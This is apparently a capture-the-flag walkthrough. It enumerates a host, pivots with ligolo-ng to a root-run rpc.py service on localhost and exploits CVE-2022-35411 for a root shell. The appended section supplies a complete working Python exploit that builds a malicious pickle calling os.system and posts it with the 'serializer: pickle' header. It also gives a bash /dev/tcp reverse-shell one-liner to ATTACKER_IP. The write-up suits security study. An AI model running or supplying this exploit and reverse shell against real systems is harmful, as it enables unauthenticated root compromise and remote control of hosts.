Enumeration

Nmap

The initial Nmap scan showed that SSH and port 8000 were open.

00 - nmap

WEB Enumeration

Port 8000 was serving a ttyd web terminal.

01 - pc

Exploitation (Directly Root)

We already had a user shell, so I ran linpeas, which showed a suspicious script being run by root (rpc.py).

02 - sus

Looking at rpc.py, it was running a web application. netstat confirmed that it was listening only on localhost, on port 65432.

03 - rpc py and localhost running application

ligolo-ng

So I used ligolo-ng to reach the internal application from my attacking machine.

I started the proxy and ran the agent. Note that to reach the agent's own loopback interface (127.0.0.1) you also have to add a route for 240.0.0.1/32 through the ligolo tunnel interface: ligolo-ng maps 240.0.0.1 to the agent's 127.0.0.1, so the internal service becomes 240.0.0.1:65432 from the attacking side. For more information about this: https://docs.ligolo.ng/Localhost/

04 - agent localhost

05 - agent

CVE-2022-35411

rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the “serializer: pickle” HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle.

After some research I found that rpc.py is vulnerable to remote code execution through this unpickling bug. As the target was running the app as root, any command executed this way runs as root, so this vector gives root directly. I looked for and found a public exploit.

06 - exploit

The exploit targets 127.0.0.1 by default, so I changed the script to use 240.0.0.1 (the target's 127.0.0.1 as seen through ligolo-ng).

First I tested the exploit with a simple HTTP request, and it worked.

07 - testing exploit

08 - it works

Then I started a netcat listener, sent a bash reverse shell as the command, and got a shell as root.

09 - exploit

10 - gg
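To make the bug and the exploit concrete, here is an added example (it is not the walkthrough author's script and not rpc.py's own code). It shows a simplified stand-in for the vulnerable deserialization in rpc.py through 0.6.0 next to a hardened variant that does not let the request choose the deserializer, and a payload builder plus sender that does what the public exploit does: post a pickle whose deserialization calls os.system with the "serializer: pickle" header from the CVE description. Assumed rather than taken from the page: the endpoint path "/sayhi", the Content-Type value, and the hardened variant (it is one safe option, not the project's actual patch); 240.0.0.1:65432 is the target's loopback service as reached through the ligolo-ng route.

```python
# Added example (not the author's exploit script, not rpc.py's code).
import json
import os
import pickle
import urllib.request


def _serializer_from(headers):
    """Header names are case-insensitive; JSON is the documented default."""
    return {k.lower(): v for k, v in headers.items()}.get("serializer", "json")


def deserialize_vulnerable(headers, body):
    """Stand-in for the pre-fix logic: the *client* picks the serializer, so a
    'serializer: pickle' header routes an untrusted body into pickle.loads."""
    if _serializer_from(headers) == "pickle":
        return pickle.loads(body)  # runs whatever callable the pickle names
    return json.loads(body)


def deserialize_hardened(headers, body):
    """One safe variant (assumed here, not rpc.py's actual patch): the request
    cannot choose the deserializer, and anything that is not JSON is refused."""
    serializer = _serializer_from(headers)
    if serializer != "json":
        raise ValueError("unsupported serializer: %r" % serializer)
    return json.loads(body)


class _Call:
    """Pickles to a call of runner(arg); unpickling performs that call."""

    def __init__(self, arg, runner=os.system):
        self.arg = arg
        self.runner = runner

    def __reduce__(self):
        return (self.runner, (self.arg,))


def build_payload(cmd, runner=os.system):
    """Pickle whose deserialization executes cmd via os.system by default.
    Passing a harmless runner (e.g. len) gives a payload safe for testing."""
    return pickle.dumps(_Call(cmd, runner), protocol=2)


def send_payload(url, cmd, timeout=10):
    """POST the pickle with the header that makes the server unpickle it.
    The command runs during deserialization, so a blocking command (an
    interactive reverse shell) keeps the request open; that is expected."""
    req = urllib.request.Request(
        url,
        data=build_payload(cmd),
        method="POST",
        headers={"serializer": "pickle", "Content-Type": "application/octet-stream"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    import sys

    # "/sayhi" is an assumed endpoint path; any path that reaches the
    # deserializer works for the unpickle itself.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://240.0.0.1:65432/sayhi"
    cmd = sys.argv[2] if len(sys.argv) > 2 else "id > /tmp/rpc_poc"
    try:
        print(send_payload(target, cmd))
    except Exception as exc:  # the server may error after the command already ran
        print("request finished with:", exc)
```

Test with a non-interactive command first (write a file, or call back to your own host), exactly as the walkthrough did, before sending a reverse shell such as `bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'`; with a reverse shell the HTTP request never completes, which is fine because the listener already has the shell. The harmless `runner=len` form is only for exercising the deserializer offline.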
